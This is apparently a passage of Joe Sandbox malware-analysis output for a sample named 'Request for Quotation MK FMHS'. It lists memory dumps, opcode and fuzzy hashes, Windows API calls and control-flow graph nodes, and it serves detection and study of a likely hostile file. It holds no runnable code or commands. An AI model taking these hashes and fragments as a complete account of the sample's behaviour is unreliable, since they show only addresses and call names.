                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        • Opcode ID: 2e9b6a0f1500085544b44e0b24055687951405ae74f776005269ea448de91404
                                                                                                                        • Instruction ID: 2506db93c77ad4240b20aadf4d0cdfb94d09d104536049f3a8d863ac75708d7d
                                                                                                                        • Opcode Fuzzy Hash: 2e9b6a0f1500085544b44e0b24055687951405ae74f776005269ea448de91404
                                                                                                                        • Instruction Fuzzy Hash: C511F2B58403499FDB10DF9AC885BDEBBF8EB48310F10881AE918A7600C375A944CFA5
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0153AF5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 9224c74becd9351df6479b02a0f4743943f5fc8cdfcf5abcc6e0b39b12d56b7e
                                                                                                                        • Instruction ID: 26fc39c26e6a369bab84b595ef3a9e3c8de6d035e7793f31109c4e51da623b83
                                                                                                                        • Opcode Fuzzy Hash: 9224c74becd9351df6479b02a0f4743943f5fc8cdfcf5abcc6e0b39b12d56b7e
                                                                                                                        • Instruction Fuzzy Hash: 641110B6C006498FDB10CF9AC444BDEFBF4EB88214F10842AD868A7250C379A545CFA1
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0741C175
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        • Opcode ID: 8c06d8ffa251851bbe3ed52ceb8d309a558a50918eb841fa5e5b0a748da41102
                                                                                                                        • Instruction ID: 59ca1fe4c1e87a0cc60c2f2577808e6412aa7f059776ab8a56e6ddf0ee96d407
                                                                                                                        • Opcode Fuzzy Hash: 8c06d8ffa251851bbe3ed52ceb8d309a558a50918eb841fa5e5b0a748da41102
                                                                                                                        • Instruction Fuzzy Hash: 4E1100B58003499FDB10DF9AC885BDEFBF8EB48320F20841AE958A3600D375A944CFA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 543e7a02f0367113bd2462ed4c59f78db1e109c49054eecab91554663767c62c
                                                                                                                        • Instruction ID: 18517812696b5c11b876fdfd5546b3493172395e815881efc3cd765cf4e4ab28
                                                                                                                        • Opcode Fuzzy Hash: 543e7a02f0367113bd2462ed4c59f78db1e109c49054eecab91554663767c62c
                                                                                                                        • Instruction Fuzzy Hash: DA213371510248DFDB41DF94E8C0B26BF65FB88318F24C169ED090B246C336D446CAA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fa696aceb696e8a36c1f2ed5bbe49a3dc4413321790b1ec4e30eb1fb8b2c6ea8
                                                                                                                        • Instruction ID: 59c464781750d5adc320c975d347609a5e12df5a945f1c6199f4d3dd7f8b7fec
                                                                                                                        • Opcode Fuzzy Hash: fa696aceb696e8a36c1f2ed5bbe49a3dc4413321790b1ec4e30eb1fb8b2c6ea8
                                                                                                                        • Instruction Fuzzy Hash: 7F21037161424CDFDB01DF94C5C0B25BB69FB84224F24C5ADD9894B283C376D886CA61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2c5143b36ed44ab930d8bc3322deff6d1593a464979a9b56e1101529ba972e59
                                                                                                                        • Instruction ID: d085969befbd2802770f33866bf3c32f0a978f016298a102fa71e74ea4c3ffc6
                                                                                                                        • Opcode Fuzzy Hash: 2c5143b36ed44ab930d8bc3322deff6d1593a464979a9b56e1101529ba972e59
                                                                                                                        • Instruction Fuzzy Hash: F921337161434CDFDB10DF54D4C0B26BB69EB84314F24C569D98A0B2C2C377D487CAA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                                                                        • Instruction ID: f55a9fe3c3ca9b1a61a8e3f37fb40d117370197f36ffe92dff729d6fef36c0f1
                                                                                                                        • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                                                                        • Instruction Fuzzy Hash: 0111DF76404284CFCB12CF54D5C0B16BF71FB84328F24C6A9DD090B656C336D45ACBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                                                        • Instruction ID: f5f19294c7fa5d51a3ae21c659fcf5a5b1e9e8822ee3aed5bdf65cb0e84fddd1
                                                                                                                        • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                                                        • Instruction Fuzzy Hash: 1811BE75604288CFCB12CF54D5C4B15BB61FB84314F24C6AAD9494B696C33BD44ACBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                                                        • Instruction ID: a75c489d0f41204540cb64855f595d240a0398ae853c693686dd0a79101e7f2f
                                                                                                                        • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                                                        • Instruction Fuzzy Hash: 5511BB75604288DFDB12CF54C5C0B15BBA1FB84224F28C6AAD9894B697C33AD48ACB61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6baed16f7c67a649311011fdb6e08928cbffecfd6cab4a9e71d71c7ba4e7b72e
                                                                                                                        • Instruction ID: 0df6de14f48244e901ceaff5a1b092786336b96d0e1811b919cb93adb2bb378d
                                                                                                                        • Opcode Fuzzy Hash: 6baed16f7c67a649311011fdb6e08928cbffecfd6cab4a9e71d71c7ba4e7b72e
                                                                                                                        • Instruction Fuzzy Hash: 4301D631114388DFF7589BAADDC4B66FFD8DF41221F18C45AEE094A286D7799840CAB2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5386360f11cce70ea45fefafab47afde2502b23f1b7c29c451a7a10f90e027b5
                                                                                                                        • Instruction ID: bbf9b6fe04ebbd27a664591751bdf7e6418bbc0d623fb673a1247282958134f1
                                                                                                                        • Opcode Fuzzy Hash: 5386360f11cce70ea45fefafab47afde2502b23f1b7c29c451a7a10f90e027b5
                                                                                                                        • Instruction Fuzzy Hash: 6FF0F6320043849FF7148A0ADDC4B62FFE8EF40634F18C45AEE080B287C3799840CAB1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 3/ev
                                                                                                                        • API String ID: 0-1361560165
                                                                                                                        • Opcode ID: 21ee13be5a0d45f66ff4f7b03a69d28d8d90d82c19c695741a50162811fd9b47
                                                                                                                        • Instruction ID: 80865f3e0ea09323fe17f46a6dfbad945faf6bb628006a5bf81926afbeb9e546
                                                                                                                        • Opcode Fuzzy Hash: 21ee13be5a0d45f66ff4f7b03a69d28d8d90d82c19c695741a50162811fd9b47
                                                                                                                        • Instruction Fuzzy Hash: 8DE1F5B4E102198FDB15DFA8C580AAEFBF2FB89304F24816AD414AB355D734AD41CFA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5ad4615ce531c3c758e2d6526cd5b16fdc2d603d76ab83eefe4bcf1d61aff989
                                                                                                                        • Instruction ID: 617ebf77eb8b593ca9fdf10f95850ec3b0effb25a00f0f14af1967950239c206
                                                                                                                        • Opcode Fuzzy Hash: 5ad4615ce531c3c758e2d6526cd5b16fdc2d603d76ab83eefe4bcf1d61aff989
                                                                                                                        • Instruction Fuzzy Hash: DFE1F4B4E102198FDB14DFA8C580AEEFBB2FB89305F24816AD414AB355D734AD41CFA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2d102f75b3ac57083979424e5a7f0466a1bcc610144488734d005fc26a7b8877
                                                                                                                        • Instruction ID: e53506f37ac0292461fbf17a45c168bbefadc35598fcb4857bd4a013c32ee299
                                                                                                                        • Opcode Fuzzy Hash: 2d102f75b3ac57083979424e5a7f0466a1bcc610144488734d005fc26a7b8877
                                                                                                                        • Instruction Fuzzy Hash: ABE1F7B4E102198FDB15DFA8C580AAEFBB2FF89305F24816AD404A7355DB349D41CFA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3957e2e9ec86a382768b64d46466a2d99dcbc3b453662e776cb12b1723f2b208
                                                                                                                        • Instruction ID: a9f3e9bf135517b19c876e67ab3dab89b75a957af3c1eb4d2e4e2da823804cf4
                                                                                                                        • Opcode Fuzzy Hash: 3957e2e9ec86a382768b64d46466a2d99dcbc3b453662e776cb12b1723f2b208
                                                                                                                        • Instruction Fuzzy Hash: C0E1F4B4E102198FDB14DFA8C580AEEFBB2FB89301F24816AD414AB355D734AD41CFA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: efe9ce38e30d468234e11b5d96eb68b4fd069375dc83b26559f0cd6aeca7ca82
                                                                                                                        • Instruction ID: 725a0ba4d0e164c0bf449890cd98819da502c571a93f1e3012102e5921e1eee2
                                                                                                                        • Opcode Fuzzy Hash: efe9ce38e30d468234e11b5d96eb68b4fd069375dc83b26559f0cd6aeca7ca82
                                                                                                                        • Instruction Fuzzy Hash: 9DE104B4E102598FDB14DFA8C580AAEFBF2FB89305F24816AD414AB315D734AD41CFA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 254a590775907e89b989050b3e9c69994a6bbb05c3d29e11214ec90aa40b5e26
                                                                                                                        • Instruction ID: 9cbf0ac4621158cf2849c4692e085323b6d0212c93b75bce5eee7ff9401d0187
                                                                                                                        • Opcode Fuzzy Hash: 254a590775907e89b989050b3e9c69994a6bbb05c3d29e11214ec90aa40b5e26
                                                                                                                        • Instruction Fuzzy Hash: 7DA16036E0020A8FCF05DFB8D94099EBBB2FFC5300B15856AE905AF265DB75D916CB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f7597337a044a80ffb4193d26ea124f31b6197d32749c2d146e2dcd0aa33ea0c
                                                                                                                        • Instruction ID: 8198157b1f96a0dbfc763d60be70942aee7796e98fc6ef37fd37c646383e70fc
                                                                                                                        • Opcode Fuzzy Hash: f7597337a044a80ffb4193d26ea124f31b6197d32749c2d146e2dcd0aa33ea0c
                                                                                                                        • Instruction Fuzzy Hash: 8D5107B0E102198FDB15DFA9C9805EEFBF2EF89304F24816AD418A7316DB359941CFA5

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:17.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:14.7%
                                                                                                                        Total number of Nodes:34
                                                                                                                        Total number of Limit Nodes:5
                                                                                                                        execution_graph 20534 162e018 20535 162e024 20534->20535 20541 6de2968 20535->20541 20537 162e61f 20542 6de298a 20541->20542 20543 162e0c3 20542->20543 20555 6de992c 20542->20555 20561 6de9328 20542->20561 20565 6de9548 20542->20565 20547 6defc68 20543->20547 20551 6defc5f 20543->20551 20548 6defc8a 20547->20548 20549 6de9548 2 API calls 20548->20549 20550 6defd3a 20548->20550 20549->20550 20550->20537 20552 6defc8a 20551->20552 20553 6de9548 2 API calls 20552->20553 20554 6defd3a 20552->20554 20553->20554 20554->20537 20560 6de97e3 20555->20560 20556 6de9924 LdrInitializeThunk 20558 6de9a81 20556->20558 20558->20543 20559 6de9328 LdrInitializeThunk 20559->20560 20560->20556 20560->20559 20562 6de933a 20561->20562 20564 6de933f 20561->20564 20562->20543 20563 6de9a69 LdrInitializeThunk 20563->20562 20564->20562 20564->20563 20569 6de9579 20565->20569 20566 6de96d9 20566->20543 20567 6de9924 LdrInitializeThunk 20567->20566 20569->20566 20569->20567 20570 6de9328 LdrInitializeThunk 20569->20570 20570->20569 20571 6de9c70 20572 6de9c9d 20571->20572 20573 6de9328 LdrInitializeThunk 20572->20573 20574 6debb7f 20572->20574 20575 6de9fa6 20572->20575 20573->20575 20575->20574 20576 6de9328 LdrInitializeThunk 20575->20576 20576->20575

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 974 6de9548-6de9577 975 6de957e-6de9614 974->975 976 6de9579 974->976 978 6de96b3-6de96b9 975->978 976->975 979 6de96bf-6de96d7 978->979 980 6de9619-6de962c 978->980 981 6de96eb-6de96fe 979->981 982 6de96d9-6de96e6 979->982 983 6de962e 980->983 984 6de9633-6de9684 980->984 986 6de9705-6de9721 981->986 987 6de9700 981->987 985 6de9a81-6de9b7e 982->985 983->984 1000 6de9686-6de9694 984->1000 1001 6de9697-6de96a9 984->1001 992 6de9b86-6de9b90 985->992 993 6de9b80-6de9b85 985->993 990 6de9728-6de974c 986->990 991 6de9723 986->991 987->986 997 6de974e 990->997 998 6de9753-6de9785 990->998 991->990 993->992 997->998 1006 6de978c-6de97ce 998->1006 1007 6de9787 998->1007 1000->979 1003 6de96ab 1001->1003 1004 6de96b0 1001->1004 1003->1004 1004->978 1009 6de97d5-6de97de 1006->1009 1010 6de97d0 1006->1010 1007->1006 1011 6de9a06-6de9a0c 1009->1011 1010->1009 1012 6de9a12-6de9a25 1011->1012 1013 6de97e3-6de9808 1011->1013 1016 6de9a2c-6de9a47 1012->1016 1017 6de9a27 1012->1017 1014 6de980f-6de9846 1013->1014 1015 6de980a 1013->1015 1025 6de984d-6de987f 1014->1025 1026 6de9848 1014->1026 1015->1014 1018 6de9a4e-6de9a62 1016->1018 1019 6de9a49 1016->1019 1017->1016 1023 6de9a69-6de9a7f LdrInitializeThunk 1018->1023 1024 6de9a64 1018->1024 1019->1018 1023->985 1024->1023 1028 6de98e3-6de98f6 1025->1028 1029 6de9881-6de98a6 1025->1029 1026->1025 1032 6de98fd-6de9922 1028->1032 1033 6de98f8 1028->1033 1030 6de98ad-6de98db 1029->1030 1031 6de98a8 1029->1031 1030->1028 1031->1030 1036 6de9924-6de9925 1032->1036 1037 6de9931-6de9969 1032->1037 1033->1032 1036->1012 1038 6de996b 1037->1038 1039 6de9970-6de99d1 call 6de9328 1037->1039 1038->1039 1045 6de99d8-6de99fc 1039->1045 1046 6de99d3 1039->1046 1049 6de99fe 1045->1049 1050 6de9a03 1045->1050 1046->1045 1049->1050 1050->1011
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3842296194.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_6de0000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7103df61cabb73aae503558b1b8d1565947f8ca97fd6c27b6ad6b012f3513c0a
                                                                                                                        • Instruction ID: 187381d173fd3805d892bccb1fa258885340237aa3b0a7cfc3b88ed293e6d389
                                                                                                                        • Opcode Fuzzy Hash: 7103df61cabb73aae503558b1b8d1565947f8ca97fd6c27b6ad6b012f3513c0a
                                                                                                                        • Instruction Fuzzy Hash: 4CF1F374E01218CFDB64DFA9D894B9DFBB2BF88304F1481A9E848AB355DB709985CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 44f4c672d7bde9fbf9537c15df48561e72469350e0709e97de438293190a52de
                                                                                                                        • Instruction ID: 616813f311039bfb8d251716b6fdd45b679a414c650089f7cd10b3ed80fa61c2
                                                                                                                        • Opcode Fuzzy Hash: 44f4c672d7bde9fbf9537c15df48561e72469350e0709e97de438293190a52de
                                                                                                                        • Instruction Fuzzy Hash: D0826C31A00A1ADFCB15CFA8CD84AAEBBB2FF88310F158559E9059B765D7B0E941CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dcbf582ffbd9dd13e211c4119e457ff9646235116636868eb4a3f7048ade1f38
                                                                                                                        • Instruction ID: dae0c8146ecf13a232daf20eae5483d232824336769340b55b40b13c0b1ab1a6
                                                                                                                        • Opcode Fuzzy Hash: dcbf582ffbd9dd13e211c4119e457ff9646235116636868eb4a3f7048ade1f38
                                                                                                                        • Instruction Fuzzy Hash: 31128C71A006198FDB14DF69CC54BAEBBB6FF88300F108569E906AB395DB349D42CF90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3680 1626fc8-1626ffe 3832 1627000 call 16269a0 3680->3832 3833 1627000 call 1627118 3680->3833 3834 1627000 call 1626fc8 3680->3834 3681 1627006-162700c 3682 162700e-1627012 3681->3682 3683 162705c-1627060 3681->3683 3686 1627021-1627028 3682->3686 3687 1627014-1627019 3682->3687 3684 1627062-1627071 3683->3684 3685 1627077-162708b 3683->3685 3690 1627073-1627075 3684->3690 3691 162709d-16270a7 3684->3691 3692 1627093-162709a 3685->3692 3829 162708d call 1629dd0 3685->3829 3830 162708d call 162a0e8 3685->3830 3831 162708d call 162a088 3685->3831 3688 16270fe-162713b 3686->3688 3689 162702e-1627035 3686->3689 3687->3686 3702 1627146-1627166 3688->3702 3703 162713d-1627143 3688->3703 3689->3683 3693 1627037-162703b 3689->3693 3690->3692 3694 16270b1-16270b5 3691->3694 3695 16270a9-16270af 3691->3695 3696 162704a-1627051 3693->3696 3697 162703d-1627042 3693->3697 3699 16270bd-16270f7 3694->3699 3700 16270b7 3694->3700 3695->3699 3696->3688 3701 1627057-162705a 3696->3701 3697->3696 3699->3688 3700->3699 3701->3692 3709 1627168 3702->3709 3710 162716d-1627174 3702->3710 3703->3702 3712 16274fc-1627505 3709->3712 3711 1627176-1627181 3710->3711 3713 1627187-162719a 3711->3713 3714 162750d-1627519 3711->3714 3719 16271b0-16271cb 3713->3719 3720 162719c-16271aa 3713->3720 3721 162751b-1627521 3714->3721 3722 162757d-1627580 3714->3722 3735 16271ef-16271f2 3719->3735 3736 16271cd-16271d3 3719->3736 3720->3719 3734 1627484-162748b 3720->3734 3723 1627523-1627549 3721->3723 3724 1627585 3721->3724 3722->3724 3732 1627552-1627556 3723->3732 3733 162754b-1627550 3723->3733 3726 1627587-1627589 3724->3726 3727 162758b-162759a 3724->3727 3731 16275e9-16275eb 3726->3731 3751 16275e4 3727->3751 3752 162759c-16275ab 3727->3752 3739 162755c-162755d 3732->3739 3733->3739 3734->3712 3742 162748d-162748f 3734->3742 3737 16271f8-16271fb 3735->3737 3738 162734c-1627352 3735->3738 3740 16271d5 3736->3740 3741 16271dc-16271df 3736->3741 3737->3738 3746 1627201-1627207 3737->3746 3744 1627358-162735d 3738->3744 3745 162743e-1627441 3738->3745 3740->3738 3740->3741 3740->3745 3747 1627212-1627218 3740->3747 3741->3747 3748 16271e1-16271e4 3741->3748 3749 1627491-1627496 3742->3749 3750 162749e-16274a4 3742->3750 3744->3745 3755 1627447-162744d 3745->3755 3756 1627508 3745->3756 3746->3738 3754 162720d 3746->3754 3757 162721a-162721c 3747->3757 3758 162721e-1627220 3747->3758 3759 16271ea 3748->3759 3760 162727e-1627284 3748->3760 3749->3750 3750->3714 3753 16274a6-16274ab 3750->3753 3751->3731 3752->3751 3768 16275ad-16275b3 3752->3768 3762 16274f0-16274f3 3753->3762 3763 16274ad-16274b2 3753->3763 3754->3745 3765 1627472-1627476 3755->3765 3766 162744f-1627457 3755->3766 3756->3714 3767 162722a-1627233 3757->3767 3758->3767 3759->3745 3760->3745 3764 162728a-1627290 3760->3764 3762->3756 3776 16274f5-16274fa 3762->3776 3763->3756 3769 16274b4 3763->3769 3770 1627292-1627294 3764->3770 3771 1627296-1627298 3764->3771 3765->3734 3775 1627478-162747e 3765->3775 3766->3714 3772 162745d-162746c 3766->3772 3773 1627246-162726e 3767->3773 3774 1627235-1627240 3767->3774 3777 16275b7-16275c3 3768->3777 3778 16275b5 3768->3778 3779 16274bb-16274c0 3769->3779 3780 16272a2-16272b9 3770->3780 3771->3780 3772->3719 3772->3765 3802 1627362-1627398 3773->3802 3803 1627274-1627279 3773->3803 3774->3745 3774->3773 3775->3711 3775->3734 3776->3712 3776->3742 3781 16275c5-16275de 3777->3781 3778->3781 3782 16274e2-16274e4 3779->3782 3783 16274c2-16274c4 3779->3783 3795 16272e4-162730b 3780->3795 3796 16272bb-16272d4 3780->3796 3781->3751 3804 16275e0-16275e2 3781->3804 3782->3756 3791 16274e6-16274e9 3782->3791 3788 16274d3-16274d9 3783->3788 3789 16274c6-16274cb 3783->3789 3788->3714 3794 16274db-16274e0 3788->3794 3789->3788 3791->3762 3794->3782 3797 16274b6-16274b9 3794->3797 3795->3756 3809 1627311-1627314 3795->3809 3796->3802 3807 16272da-16272df 3796->3807 3797->3756 3797->3779 3810 16273a5-16273ad 3802->3810 3811 162739a-162739e 3802->3811 3803->3802 3804->3731 3807->3802 3809->3756 3812 162731a-1627343 3809->3812 3810->3756 3815 16273b3-16273b8 3810->3815 3813 16273a0-16273a3 3811->3813 3814 16273bd-16273c1 3811->3814 3812->3802 3827 1627345-162734a 3812->3827 3813->3810 3813->3814 3816 16273c3-16273c9 3814->3816 3817 16273e0-16273e4 3814->3817 3815->3745 3816->3817 3819 16273cb-16273d3 3816->3819 3820 16273e6-16273ec 3817->3820 3821 16273ee-162740d call 16276f1 3817->3821 3819->3756 3822 16273d9-16273de 3819->3822 3820->3821 3824 1627413-1627417 3820->3824 3821->3824 3822->3745 3824->3745 3825 1627419-1627435 3824->3825 3825->3745 3827->3802 3829->3692 3830->3692 3831->3692 3832->3681 3833->3681 3834->3681
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d4ffe41341f7ec74e98b507b7915c72aeb47beb7fbe881fdbe2c477f88844df3
